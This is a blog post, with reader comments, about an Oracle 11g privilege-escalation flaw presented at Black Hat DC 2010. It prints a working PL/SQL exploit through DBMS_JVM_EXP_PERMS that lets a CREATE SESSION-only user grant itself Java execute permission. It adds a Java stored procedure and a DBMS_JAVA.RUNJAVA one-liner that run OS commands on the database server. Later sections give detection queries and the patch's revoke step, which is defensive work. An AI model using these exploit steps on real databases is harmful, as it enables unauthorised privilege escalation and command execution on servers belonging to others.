Hacking Oracle 11g

David Litchfield's slides from Black Hat DC 2010 are now online. Here is the 0day from his slides, which works even on 11g R2:

Essentially, because of a flaw in the DBMS_JVM_EXP_PERMS package (it is executable by PUBLIC, and its IMPORT_JVM_PERMS procedure writes whatever policy rows it is handed into the Java policy table as SYS), any user with just the CREATE SESSION privilege can grant himself arbitrary Java permissions. The block below grants the current user java.io.FilePermission on all files with the execute action, which is what is needed to launch OS programs from the database JVM.

DECLARE
  -- TEMP_JAVA_POLICY is the collection type IMPORT_JVM_PERMS expects;
  -- each element is one Java policy row.
  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
  -- One row: GRANT <current user> SYS:java.io.FilePermission "<<ALL FILES>>" execute, ENABLED.
  -- This is the permission Runtime.exec() needs to start an OS process.
  CURSOR C1 IS SELECT 'GRANT', USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLED' FROM dual;
BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  -- Callable by PUBLIC and running as SYS: the row lands in the Java policy table unchecked.
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

Once the Java permission has been granted, a user who also holds CREATE PROCEDURE can simply create a Java stored procedure and execute OS commands from it (see http://milw0rm.com/exploits/2837).
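What such a procedure looks like, as an added example written for this post (it is not Litchfield's code and not the milw0rm exploit verbatim): it assumes the FilePermission from the block above has already been granted to the current user, and that the user holds CREATE PROCEDURE. The class name OsCmd and the function name os_cmd are arbitrary choices.

```sql
-- Step 1: load a Java class into your own schema (needs CREATE PROCEDURE).
-- No blank lines inside the source: SQL*Plus treats one as end of statement.
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "OsCmd" AS
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class OsCmd {
    public static String run(String cmd) throws Exception {
        // Runtime.exec() is the call that requires java.io.FilePermission
        // "<<ALL FILES>>" execute, i.e. exactly what IMPORT_JVM_PERMS granted.
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
        StringBuilder out = new StringBuilder();
        String line;
        while ((line = r.readLine()) != null && out.length() < 3500) {
            out.append(line).append('\n');   // stay under the 4000-byte VARCHAR2 limit
        }
        p.waitFor();
        return out.toString();
    }
}
/
-- Step 2: a PL/SQL call spec that maps onto the static Java method.
CREATE OR REPLACE FUNCTION os_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2
AS LANGUAGE JAVA NAME 'OsCmd.run(java.lang.String) return java.lang.String';
/
-- Step 3: the function now runs OS commands as the OS account the database server runs under.
SELECT os_cmd('cmd.exe /c dir c:\') FROM dual;   -- Windows
SELECT os_cmd('/bin/sh -c id') FROM dual;        -- Unix
```

Without the FilePermission grant, the same SELECT fails with a java.security.AccessControlException from the Oracle JVM, which is why the IMPORT_JVM_PERMS step matters: CREATE PROCEDURE alone was never enough to reach the OS.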

However, if the CREATE PROCEDURE privilege is not available, David has another way to execute OS commands: DBMS_JAVA.RUNJAVA, which is callable by PUBLIC, runs the oracle/aurora/util/Wrapper class with the command line passed to it:

select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst') from dual;

Here is the link to the talk video:
https://media.blackhat.com/bh-dc-10/video/Litchfield_David/BlackHat-DC-2010-Litchfield-DefeatSSL-video.mov
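For the defensive side, an added example that is not from the slides or the post: the queries a DBA can run to see whether this path is open on a given instance, followed by the statements that close it. The grantee SCOTT is a placeholder, and the list of accounts excluded in the second query is an assumption to be tuned per release.

```sql
-- 1. Is DBMS_JVM_EXP_PERMS still callable by everyone?  A row with GRANTEE = 'PUBLIC'
--    means a CREATE SESSION-only user can run the exploit above.
SELECT grantee, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_JVM_EXP_PERMS';

-- 2. Who already holds OS-reaching Java permissions?  The exploit lands here as
--    GRANT / <user> / SYS / java.io.FilePermission / <<ALL FILES>> / execute / ENABLED.
--    Accounts Oracle grants these to by design are excluded (assumed list).
SELECT seq, kind, grantee, type_name, name, action, enabled
  FROM dba_java_policy
 WHERE kind = 'GRANT'
   AND type_name IN ('java.io.FilePermission',
                     'java.lang.RuntimePermission',
                     'java.security.AllPermission')
   AND grantee NOT IN ('SYS', 'JAVASYSPRIV', 'JAVA_ADMIN')
 ORDER BY grantee, seq;

-- 3. Close the hole (run as SYS).  The REVOKE is what the April 2010 CPU's
--    jvm_exp.sql performs; the PL/SQL block removes a policy row the exploit left behind.
REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC;

BEGIN
  -- SCOTT stands for a grantee found by query 2.
  DBMS_JAVA.REVOKE_PERMISSION('SCOTT',
                              'SYS:java.io.FilePermission',
                              '<<ALL FILES>>',
                              'execute');
END;
/
```

Query 2 is worth scheduling even after patching: the CPU revokes access to the package but does not undo grants an attacker made before the patch landed. Where the row is known by its SEQ from query 2, DBMS_JAVA.DELETE_PERMISSION(seq) removes it directly.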


7 Thoughts on "Hacking Oracle 11g"

  1. Pingback: Alexander Kornbrust Oracle Security Blog » Blog Archive » Oracle 11g 0day exploit published

  2. Pingback: Gildus » Blog Archive » Oracle databases can be hacked remotely

  3. Pingback: Bug in Oracle 11g « Shimoon Security

  4. I like this post. Great post and great blog.

  5. Stuart on August 11, 2010 at 1:59 am said:

    The 11.2.0.1 April CPU patch fixes this.

    Check out the last lines of the jvm_exp.sql script:

    9454036/files/javavm/install/jvm_exp.sql

    begin
      -- Pull the package out of PUBLIC's reach; CREATE SESSION-only users can no longer call it.
      initjvmaux.exec('revoke execute on sys.dbms_jvm_exp_perms from PUBLIC');
    exception
      when others then
        -- Tolerate "already revoked" (ORA-01927) and PL/SQL compile/stack errors
        -- (ORA-06550, ORA-06512) so the script can be re-run; anything else is re-raised.
        if sqlcode not in (-01927, -06550, -06512) then raise; end if;
    end;
    /

    A user with create session privileges can no longer see DBMS_JVM_EXP_PERMS after applying the patch.

  6. Pingback: Hack all the world - Metasploit oracle windows - Focusecurity.Org
